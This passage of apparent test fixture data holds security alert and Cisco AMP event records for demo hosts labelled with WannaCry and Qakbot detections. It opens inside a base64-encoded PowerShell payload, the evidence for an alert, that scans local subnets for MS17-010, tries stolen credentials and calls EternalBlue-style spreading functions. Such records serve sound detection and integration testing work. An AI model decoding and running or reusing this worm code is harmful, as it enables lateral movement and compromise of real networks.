yACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 